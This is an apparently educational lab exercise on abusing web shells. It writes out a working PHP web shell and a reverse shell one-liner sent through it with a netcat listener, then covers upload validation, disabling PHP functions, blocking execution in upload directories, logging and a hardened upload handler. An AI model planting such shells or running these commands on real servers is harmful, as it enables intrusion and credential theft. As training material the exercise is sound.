Exercise 38: Abusing Web Shells for Privilege Escalation

Jul 12, 2025

Objective: Learn to exploit a web shell for privilege escalation on a compromised web server, and understand how to secure web servers against such attacks.


Scenario: Web shells are malicious scripts uploaded to a web server to allow attackers to execute arbitrary commands. Once a web shell is deployed, attackers can use it to interact with the server’s file system, extract sensitive information, and escalate privileges. Your task is to deploy and exploit a web shell while implementing measures to secure the server.


Lab Setup

  1. Environment:
    • A web server vulnerable to file upload attacks.
  2. Tools Required:
    • A web shell script (e.g., PHP-based shell).
    • Terminal access for interacting with the web shell.

Lab Steps

Step 1: Deploy a Web Shell

  1. Identify a file upload vulnerability in the web application.
    • Example: An upload form that doesn’t validate file types.
  2. Create a simple PHP web shell (system() runs the supplied command and returns its output; the call had been dropped from the listing between the <pre> tags): <?php if(isset($_REQUEST['cmd'])) { echo '<pre>'; system($_REQUEST['cmd']); echo '</pre>'; } ?>
    • Save the file as shell.php.
  3. Upload the web shell to the server using the vulnerable upload form.
  4. Access the uploaded web shell in your browser: http://<target_ip>/uploads/shell.php

Step 2: Interact with the Web Shell

  1. Use the web shell to execute system commands: http://<target_ip>/uploads/shell.php?cmd=ls
    • Replace ls with other commands to explore the server.
  2. Identify sensitive files, such as:
    • Configuration files (e.g., wp-config.php, .env).
    • User credentials or database connections.

Step 3: Escalate Privileges

  1. Search for privilege escalation vectors:
    • Writable cron jobs.
    • Misconfigured file permissions.
    • SUID binaries.
  2. Deploy a reverse shell payload through the web shell: http://<target_ip>/uploads/shell.php?cmd=bash -i >& /dev/tcp/<your_ip>/4444 0>&1
    • Replace <your_ip> and 4444 with your listener’s IP and port.
  3. Set up a listener on your machine: nc -lvnp 4444
  4. Verify the reverse shell connection and check your privileges: whoami

Solution

Explanation:

  • A web shell provides attackers with remote access to a server’s command line.
  • By escalating privileges, attackers can gain root access and compromise the entire server.

Prevention:

  1. Validate File Uploads:
    • Restrict allowed file types using MIME type validation.
    • Example configuration in PHP: $allowed = ['image/jpeg', 'image/png']; if (!in_array($_FILES['file']['type'], $allowed)) { die('Invalid file type.'); }
      • Caveat: $_FILES['file']['type'] is copied from the client's Content-Type header and is not verified by PHP, so on its own this check is satisfied by any client that sets the header; determine the type server-side from the file contents (finfo_file() with FILEINFO_MIME_TYPE), allowlist the extension, and store uploads under a server-generated name.
  2. Disable Dangerous PHP Functions:
    • Disable functions like system, exec, and shell_exec in php.ini: disable_functions = system,exec,shell_exec,passthru
      • Also include proc_open and popen, which spawn processes as well; disable_functions only restricts PHP, not other interpreters (Perl, Python, JSP) that the server may have enabled for uploaded files.
  3. Restrict Directory Permissions:
    • Ensure upload directories cannot execute scripts: chmod -R 750 /var/www/uploads
      • Add a .htaccess file to deny script execution: <FilesMatch ".*\.(php|pl|py|jsp)$"> deny from all </FilesMatch>
      • Caveat: file permissions do not stop mod_php from interpreting a .php file the web server can read, so it is the .htaccess rule (or php_admin_flag engine off for that directory, or keeping uploads outside the document root) that actually blocks execution. deny from all is Apache 2.2 syntax; on Apache 2.4 use Require all denied, and extend the pattern to other extensions the server hands to PHP, such as .phtml and .phar.
  4. Monitor and Log Activity:
    • Use web server logs to detect unusual activity: sudo tail -f /var/log/apache2/access.log
      • Look for requests to files in the upload directory, especially GET or POST requests carrying parameters such as cmd=, and for outbound connections from the web server process to unexpected hosts.
  5. Deploy a Web Application Firewall (WAF):
    • Use tools like ModSecurity to filter malicious requests.
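As an added example (not part of the original exercise), a hardened PHP upload handler that replaces the client-trusted $_FILES['file']['type'] check from the Prevention section with content-based detection, a server-chosen name and extension, and storage outside the web root; the path /var/www/private_uploads and the form field name "file" are assumptions.

```php
<?php
// Added example, not from the original exercise: a hardened upload handler.
// Assumptions: the form field is named "file" and UPLOAD_DIR is a directory
// outside the document root, so nothing stored there is ever served or executed.

const UPLOAD_DIR = '/var/www/private_uploads'; // assumed path
const MAX_BYTES  = 2 * 1024 * 1024;            // 2 MiB

// Server-detected MIME type => extension the server assigns (client name is discarded).
const ALLOWED = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
];

// Returns the stored filename; throws RuntimeException on any rejection.
function handle_upload(array $file): string
{
    if (!isset($file['tmp_name'], $file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed.');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large.');
    }
    // Only accept files that really came through the HTTP upload mechanism.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file.');
    }
    // Detect the type from the file's contents; $file['type'] is client-supplied.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException('Invalid file type.');
    }
    // Require the image to parse: a script with only a forged magic number fails here.
    // (A valid image with embedded PHP still passes, which is why UPLOAD_DIR is
    // outside the web root and the stored file is never executable.)
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('Not a valid image.');
    }
    // Random name and server-chosen extension: no path or extension from the client.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file.');
    }
    chmod($dest, 0640); // readable by the web server user, never executable
    return basename($dest);
}
```

Call handle_upload($_FILES['file']) from the form handler and serve stored images through a script that sets the Content-Type and streams the file, rather than by a direct URL into the upload directory.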

Testing and Verification

  1. Test file upload forms to ensure only allowed file types are accepted.
  2. Attempt to execute scripts in the upload directory to confirm they are blocked.
  3. Monitor logs for evidence of malicious activity.

Reflection

This exercise demonstrates how web shells can be used to compromise a server and escalate privileges. By implementing strong validation, disabling dangerous functions, and monitoring server activity, you can effectively secure web servers against such attacks.
